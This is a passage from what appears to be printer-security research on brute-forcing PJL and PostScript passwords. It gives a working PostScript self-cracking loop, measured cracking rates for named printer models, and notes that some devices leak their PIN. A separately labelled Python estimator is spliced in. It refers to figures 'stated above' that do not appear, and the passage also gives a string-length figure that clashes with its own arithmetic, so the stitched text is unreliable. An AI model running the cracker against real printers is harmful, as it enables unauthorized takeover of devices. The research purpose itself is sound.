PostScript has similar protection mechanisms: the SystemParamsPassword is used to change print job settings like paper size, while the StartJobPassword is required to exit the server loop and therefore permanently alter the PostScript environment. The checkpassword operator, which takes either an integer or a string as input, checks for both passwords at once [5]. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 [6], which theoretically allows 524,280 bit passwords. On the positive side (from an attacker's point of view), brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:

% try every integer from min to max as password; print the first one accepted
/min 0 def /max 1000000 def
statusdict begin {
  min 1 max
  {dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop

Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords.

% on Konica, we can simply DINQUIRE the PASSWORD:
% :/> lock 1
% PIN protection: 6500
% also note that for the Dells, the DINQUIRE command showed the password

% newer devices use 2,14mio possibilities (deskjet?)

\begin{table}[H]
% n/a*: Brother devices extrawurst | n/a**: dell devices echo the password
\begin{tabularx}{\textwidth}{|X|r|r|r|r|}

 \hline
 Printer model             & \multicolumn{2}{c|}{PJL passwords}   & \multicolumn{2}{c|}{PostScript passwords}\\
 \cline{2-5}
                           &  key size &  tests/sec &      key size &  tests/sec\\
 \hline
 \hline                                            %  $2^{19}$
 HP LaserJet 1200          &   16 bit &        200 &  524,280 bit &    5,000 \\ % 192.168.50.48            | PS: 170
 HP LaserJet 4200N         &   16 bit &        200 &  524,280 bit &   91,000 \\ % 192.168.50.30    ON  ON  | PS: 11
 HP LaserJet 4250N         &   16 bit &        130 &  524,280 bit &  100,000 \\ % 192.168.50.110   ON  ON  | PS: 10
 HP LaserJet P2015dn       &   16 bit &      1,000 &  524,280 bit &   83,000 \\ % 192.168.50.45            | PS: 12
 HP LaserJet M2727nfs      &   16 bit &        100 &  524,280 bit &  100,000 \\ % 192.168.50.38            | PS: 10
 HP LaserJet 3392 AiO      &   16 bit &      1,000 &  524,280 bit &   53,000 \\ % 192.168.50.36            | PS: 19
 HP Color LJ CP1515n       &   16 bit &      1,000 &  524,280 bit &  100,000 \\ % 192.168.50.42            | PS: 10
 Brother MFC-9120CN        &   16 bit &        n/a &        8 bit &        1 \\ % 192.168.50.37    ON UN   | PS: BROTHER | n/a*
 Brother DCP-9045CDN       &   16 bit &        n/a &        8 bit &        1 \\ % 192.168.50.34            | PS: BROTHER | n/a*
 Lexmark X264dn            &      n/a &        n/a &  524,280 bit &    5,000 \\ % 192.168.50.39            | PS: 170
 Lexmark E360dn            &      n/a &        n/a &  524,280 bit &    8,000 \\ % 192.168.50.43            | PS: 120
 Lexmark C736dn            &      n/a &        n/a &  524,280 bit &   53,000 \\ % 192.168.50.202           | PS: 19
 Dell 5130cdn              &      n/a &        n/a &  524,280 bit &   62,000 \\ % 192.168.50.24            | PS: 16      | n/a**
 Dell 1720n                &      n/a &        n/a &  524,280 bit &   12,000 \\ % 192.168.50.44            | PS: 80
 Dell 3110cn               &      n/a &        n/a &  524,280 bit &   50,000 \\ % 192.168.50.33            | PS: HMMM    | n/a**
 Kyocera FS-C5200DN        &   16 bit &         50 &          n/a &      n/a \\ % 192.168.50.35  OFF  OFF  | PS: --
 Samsung CLX-3305W         &      n/a &        n/a &  524,280 bit &   62,000 \\ % 192.168.50.87            | PS: HMMM
 Samsung MultiPress 6345N  &      n/a &        n/a &          n/a &      n/a \\ % 192.168.50.92            | PS: HMMM
 Konica bizhub 20p         &   16 bit &        n/a &        8 bit &        1 \\ % 192.168.50.123   ON  UN  | PS: BROTHER | n/a*
 OKI MC342dn               &      n/a &        n/a &  524,280 bit &   38,000 \\ % 192.168.50.127

% \hline % Konica bizhub C454e & 16 bit & 50 & 524,280 bit &  ? \\

 \hline

\end{tabularx}
\caption{Exhaustive key search in PJL and PostScript}
\label{tab:cracking-results}
\end{table}
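The table turns into concrete exposure figures once key size and verification rate are combined. The following Python code is an added example, not part of the thesis draft or the wiki: it parses rows in the table's LaTeX form (three rows copied from above, trailing `%` comments dropped) and computes the average and worst-case time for an exhaustive search, approximating a k-bit key space as 2^k (the PJL space is 65,535 values, so the 16-bit figures are a few percent high). The PJL averages reproduce the 30-second-to-ten-minute range stated above; the 8-bit Brother case exhausts in minutes even at one test per second, while the 524,280-bit PostScript case is out of reach.

```python
"""Exhaustive-search time estimates from the cracking-results table
(added example, not part of the Hacking Printers wiki or the thesis draft).
Rows are copied from the table; key space is approximated as 2^bits."""

TABLE_ROWS = r"""
 HP LaserJet P2015dn       &   16 bit &      1,000 &  524,280 bit &   83,000 \\ % comment dropped
 Brother MFC-9120CN        &   16 bit &        n/a &        8 bit &        1 \\
 Kyocera FS-C5200DN        &   16 bit &         50 &          n/a &      n/a \\
"""

SECONDS_PER_YEAR = 31_557_600


def _num(cell: str):
    """'16 bit' -> 16, '1,000' -> 1000, 'n/a' -> None."""
    cell = cell.strip()
    if cell.lower() == "n/a":
        return None
    return int(cell.replace(" bit", "").replace(",", ""))


def parse_rows(text: str) -> list:
    """Parse tabularx rows 'model & pjl bits & pjl rate & ps bits & ps rate \\'."""
    rows = []
    for line in text.splitlines():
        line = line.split("%", 1)[0].strip()        # strip LaTeX comments
        if not line or "&" not in line:
            continue
        cells = [c.strip() for c in line.rstrip("\\").split("&")]
        model, pjl_bits, pjl_rate, ps_bits, ps_rate = cells
        rows.append({"model": model,
                     "pjl": (_num(pjl_bits), _num(pjl_rate)),
                     "ps": (_num(ps_bits), _num(ps_rate))})
    return rows


def exhaust_seconds(bits, rate):
    """(average, worst-case) seconds to try a 2^bits key space at 'rate'
    verifications per second, as integers so that huge key spaces do not
    overflow a float.  None if either figure is not applicable."""
    if bits is None or rate is None:
        return None
    space = 2 ** bits
    return (space // (2 * rate), space // rate)


def summarize(rows: list) -> list:
    """(model, average PJL seconds, average PostScript seconds) per row."""
    out = []
    for row in rows:
        pjl = exhaust_seconds(*row["pjl"])
        ps = exhaust_seconds(*row["ps"])
        out.append((row["model"], pjl[0] if pjl else None, ps[0] if ps else None))
    return out


def describe(seconds) -> str:
    """Human-readable duration; astronomically large values are given in years."""
    if seconds is None:
        return "n/a"
    if seconds < 3600:
        return "%d s" % seconds
    years = seconds // SECONDS_PER_YEAR
    return "%d years" % years if years else "%d min" % (seconds // 60)


if __name__ == "__main__":
    for model, pjl_avg, ps_avg in summarize(parse_rows(TABLE_ROWS)):
        print("%-22s PJL avg: %-10s PostScript avg: %s" % (model, describe(pjl_avg), describe(ps_avg)))
```

The integer arithmetic matters: 2^524280 cannot be represented as a float, so a naive `space / rate` would raise rather than report the (meaningless but finite) number of years.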

-->
  1. Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers, D. Heiland and M. Belton, 2011
  2. Printer Job Language Technical Reference Manual, HP Inc., 1997, ch. 6-21
  3. Attacking Networked Embedded Devices, Black Hat USA, FX and FtR of Phenoelit, 2002
  4. PostScript Language Reference Manual, 3rd Edition, Adobe Systems Inc., 1999, p. 739
  5. PostScript Language Reference Manual Supplement for Version 2016, Adobe Systems Inc., 1995, p. 194
  6. PostScript Language Reference Manual, 3rd Edition, Adobe Systems Inc., 1999, p. 739